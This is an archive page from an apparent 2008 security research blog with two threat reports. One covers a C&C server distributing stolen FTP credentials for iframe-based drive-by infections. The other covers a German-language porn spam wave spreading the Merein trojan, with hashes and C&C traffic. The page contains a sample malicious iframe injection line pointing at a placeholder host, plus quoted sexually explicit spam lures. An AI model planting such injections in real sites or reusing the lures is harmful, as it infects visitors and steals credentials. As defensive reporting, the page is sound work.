Monthly Archives: December 2008

More than 100′000 stolen FTP credentials retrieved

A month ago I found a pretty interesting trojan in my honeypots. In an initial analysis it contacted a server in Russia, and a closer look revealed around 150, sometimes even 200, simultaneous sessions between this server and many different, probably infected, clients. Obviously I was facing quite a large-scaled command and control server (C&C) designed to serve thousands of infected systems in order to keep a bunch of different kinds of malware running. An in depth examination of the data flowing between my honeypots and this C&C suggested that the infected client received usernames and passwords for compromised FTP accounts around the world from the C&C. The origin of those credentials can only be speculated about, but keyloggers or trade in specialized criminal markets for this kind of information would be plausible explanations. Subsequently the infected clients used the supplied credentials in order to log into the affected FTP accounts and recursively scanned for typical filenames appearing on websites (like index.html). Of course not all of those accounts are actually related to websites, but a considerable part of it actually is. Suitable filenames, if found, are modified in a subtle way such that unsuspecting visitors of those websites using browsers with unpatched vulnerabilities would be infected by malware without requiring any additional action by the users. This kind of infection is called a DriveBy infection, because users can be infected by simply accessing a website (hence “drive-by”). While the old-fashioned method of sending spam mails with malicious attachments becomes more and more ineffective, DriveBy infections are increasingly posing the method of choice.

Until now it was possible to collect more than 100′000 unique FTP credentials from the Russian C&C server.

Here is a short illustration how the criminal process works:

  1. Heya! Feed me Seymour, I want FTP credentials!
  2. Here you have some FTP credentials:
    Username: User
    Password: stupidpassword
  3. Our zombie tries to login using the supplied FTP credentials.
  4. If the login is successful,
  5. He tries to inject malicious code (iframes) into a one or more .html files that already exist on the victim server, eg:
    < iframe src=evilserver.tld/getexploits.php border=0 >
  6. An unsuspecting user (“poor-guy”) visits; he trusts this site because he used it many times before and never experienced any problems.
  7. Poor-guy gets back the normal webcontent as usual, but this time “enriched” with an invisible iframe that points to the malicious domain evilserver.tld.
  8. The browser of poor-guy is now downloading the script getexploits.php on evilserver.tld…
  9. But this script getexploits.php is malicious and tries to exploit several well known vulnerabilities in the browser or in installed plugins of poor-guy…
    If any of those attacks is successful, the browser of poor-guy will download a trojan from evilserver.tld which turns his computer into another zombie.This zombie can now watch poor-guy’s actions, steal his bank accounts, or install other drive-by infections as in step 1 – the zombie is under control of the attacker.

Cycle 1: Drive-By setup cycle
Cycle 2: Drive-By exploit cycle

Let’s have a closer look at these FTP credentials. Currently there are “only” around 150 credentials related to Swiss Internet service providers (ISPs) – among others a Swiss university, a website of a cantonal (state) administration, and a couple of international organisations with offices registered in Switzerland.

The Swiss Reporting and Analysis Centre for Information Assurance (MELANI) contacted most of the more important owners meanwhile – contacting all of them will take more time due to their very limited resources. An extended look at the affected accounts worldwide is much scarier though, as credentials from space centres, banks, universities, TV channels and political parties show up.

The table below gives you a short summary of the fifteen countries with the largest number of captured credentials:

Rank Country # of credentials in %
1 US United Staates 33’033 29.48
2 RU Russia 19’464 17.37
3 UNKNOWN UNKNOWN 16’209 14.47
4 TR Turkey 4’210 3.76
5 DE Germany 4’153 3.71
6 HU Hungary 3’787 3.38
7 AU Australia 3’318 2.96
8 UA Ukraine 2’895 2.58
9 CZ Czech Republic 2’568 2.29
10 TH Thailand 1’967 1.76
11 IN India 1’951 1.74
12 PL Poland 1’927 1.72
13 CA Canada 1’737 1.55
14 GB United Kingdom 1’643 1.47
15 FR France 1’562 1.39
other 11’618 10.37

As you can see, nearly 30% of the retrieved credentials concerns US ISPs.
Note: UNKNOWN are mostly credentials from private addresses in local area networks (LAN) like 192.168.x.x etc.

Currently I’m working together with the Swiss Reporting and Analysis Centre for Information Assurance (MELANI) and the US CERT Coordination Center (CERT/CC) to inform the relevant authorities in affected countries, preferably national CERTs, as far as this is possible given the dimension of the problem. Most European countries are already informed.

Last but not least I would like to express special thanks to MELANI / and the US CERT/CC who were supporting me since I work on that case. Thank you very much! You guys do a great job!

If you have any question please use the contact form.

Porno-Mails verbreiten Malware in der Schweiz

Seit dem frühen Morgen verbreitet sich der Trojaner Merein (TrendMicro / Sophos) über eine Spam-Welle, welche auf Schweizer Benutzer abzielt. Der E-Mail Text sowie der Betreff ist jeweils auf deutsch verfasst:

Betreff: Blasen mit Madonna

Die erste Seite in der Schweiz, wo es Promis vor der Kamera treiben! Die junge Madonna mit einem prallen Schwengel im Mund oder die skandalösen Clips mit Britney Spears beim Sexspiel vor laufender Kamera! Aber auch Stars aus der Schweiz sind dabei! Und eine ganze Menge davon! Nur bei uns! HEISSE VIDEOS MIT PROMIS!

Betreff sowie die angegebene URL im E-Mail Text variieren.


  • (
  • (
  • (
  • Betreff:

  • Britney Spears vor der Pornokamera – Skandal!
  • Promiporn
  • Blasen mit Gillian Anderson – Video
  • Junge Portugiesinnen brennen vor Verlangen
  • Blasen mit Madonna
  • Bumsen und Blasen in heissen portugiesischen Stadten
  • Stars gehen am Pornohimmel auf
  • Der Empfänger der E-Mail wird dazu verleitet, auf den im Spam-Mail angegebenen Link zu klicken. Die Webseite nennt sich PornTube und beinhaltet angeblich pornografisches Material. Wird auf ein Bild auf der Webseite geklickt, wird der Besucher dazu aufgefordert, ein Adobe Flash Player HD Plugin zu installieren um den Inhalt anschauen zu können:

    Klickt der Besucher auf CLICK HERE TO DOWNLOAD THE FULL VIDEO ADOBE FLASH PLAYER HD PLUGIN, bekommt er die ausführbare Datei patch_downloader.exe. Die Datei beinhaltet einen Trojaner namens Merein (TrendMicro / Sophos):

    Filename: patch_downloader.exe
    File size: 5436 bytes
    MD5…: 21cefa95951a4c0a5d96be750d9a5f3c
    SHA1..: f5cb1cd9211f79fe819d9d82a0a536c2ac7a014a
    Erkennungsrate: 21/38 (55.26%)

    Wird die Datei patch_downloader.exe ausgeführt, installiert sich der Trojaner auf das System:


    Als erstes bekommt der Benutzer die Meldung Please, restart your browser!. Im Hintergrund kontaktiert der Trojaner bereits einen C&C Server (


    Dabei bekommt der installierte Trojaner die Anweisung vom C&C Server weiteren Schadcode herunter zu laden:

    HTTP/1.1 302 Found
    Transfer-Encoding: chunked
    Content-Type: text/html

    document moved

    Die Datei 305.exe enthält wiederum einen Trojaner:

    Filename: 305.exe
    File size: 53248 bytes
    MD5…: c3c151386dc4b4d3495bffac9344dc80
    SHA1..: 9d72c08500aee50a84c9781dbe09c328812c6ffe
    Erkennungsrate: 3/38 (7.89%)

    Danach meldet sich der Trojaner bei einem weiteren Server (


    Und wieder einmal zeigen die Spuren zur UATelecom (, siehe frühere Posts).

    Hat sich der Trojaner einmal eingenistet, versucht dieser FTP-Logins mit zu schneiden und die Zugangsdaten zu stehen:

    POST HTTP/1.1

    URL: sniffer_ftp_***.ch


    Den Empfängern solcher E-Mails wird dringen angeraten, das E-Mail unverzüglich zu löschen und auf keinen Fall das auf den Webseiten angepriesene Adobe Plugin herunter zu laden. Unternehmen sollten es des Weiteren in Betracht ziehen, folgende Domains bzw. IP-Adressen an den zentralen Gateways zu blockieren:

  • (UATelecom)
  • (First Network Communications Hong Kong)
  • UPDATE 10:45 Uhr

    Es handelt sich um den selben Trojaner, welche bereits am 25. Oktober 2008 in den USA gesichtet wurde (Siehe Post Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins). Auch diesmal stiehlt der Trojaner nicht nur FTP Zugangsdaten sondern auch diejenigen, welche über HTTP / HTTPS übertragen werden (z.B. beim OnlineBanking).

    UPDATE 20:04 Uhr

    Die Melde- und Analysestelle Informationssicherung (MELANI) hat heute Nachmittag noch eine entsprechende Information herausgegeben:

    Information: E-Mail-Welle mit dem Ziel, Schweizer Computer zu infizieren

    UPDATE 12. Dezember 2008

    Die Spam-Welle scheint nicht abzuklingen. Auch in den letzten Tagen wurde massenweise solcher Spam-Mails verschickt. Hier noch ein exemplar:

    Hallo! Wir sind absolut neu! Und nur für Dich! Du findest uns im Netz unter der Adresse … Bei uns findest Du Videos und heiße Bilder für jeden Geschmack, auch Hardcore, Natursekt, Sodomie und vieles andere mehr! Absolut geil! Lass Deiner Phantasie freien Lauf! Auch Pornoklassiker aus den 70ern und 80ern, jede Menge! Komm rein und leg los! Dem Download sind keine Grenzen gesetzt!


  • Ficken ohne Grenzen
  • Videos – nur das Beste!
  • Die erste offizielle und kostenlose Pornoseite in der Schweiz
  • Das beste an Prono im Schweizer Internet
  • Das wahnsinnige Blaskonzert
  • Die beste Sammlung von Pornofilmen
  • Geile Filme fur jeden perversen Geschmack
  • Schuler in Schweizer Schulen besorgen es sich selbst und in der Gruppe
  • Weiter domains, welche derzeit aktiv den Trojaner verbreiten:

  • (
  • (
  • (
  • (